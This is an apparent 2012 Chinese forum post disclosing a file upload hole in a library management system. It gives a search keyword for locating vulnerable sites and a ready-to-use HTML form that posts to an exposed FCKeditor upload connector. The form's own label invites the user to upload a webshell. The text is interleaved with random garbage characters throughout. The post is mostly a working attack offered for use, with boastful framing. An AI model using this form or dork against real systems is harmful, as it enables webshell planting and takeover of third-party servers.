主题:图书馆系统任意文件上传漏洞
. e. L! N) G( o! n! A) Z& ^/ c- S 作者:冰锋刺客& U& G1 B: l' W' c/ t4 m' f
厂商:点击书(dianjishu.com)
8 t( I8 T$ D1 C& e6 y' P' k4 K 日期:2012-6-21, R6 C. G& a9 ?
- J. H9 v9 J4 `1 C' h _9 BI 概述
' P! I" a) `$ [% H% D 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell" X! V6 a6 ]) H. Q2 t* f
II 简介) }# i% z8 Q7 R3 R E- o
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
, c. m7 |" U" e7 K0 G' _ 补充一个漏洞- o0 x: J6 v# i) n/ }
<form id="frmUpload" enctype="multipart/form-data"
9 b1 q, `4 Y4 `! p action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>( s& G/ s, j0 z0 Z' Q
<input id="btnUpload" type="submit" value="操翻他">
$ e: P. r7 F; ^) k5 k& V </form>
& r }1 K; y: v2 p6 ` 你们懂的
( J M* k! W3 q2 x3 q x 那傻逼提供还需要改包.
5 _& G0 A3 t/ q R# W0 h G 自己看了下源代码发现fckeditor
* ]6 }+ F3 A2 v! e: Z; Y 直接秒杀0 t% s$ Y7 `9 l! c+ K' j
|
发表于 2012-9-10 21:20:59
收藏
支持
反对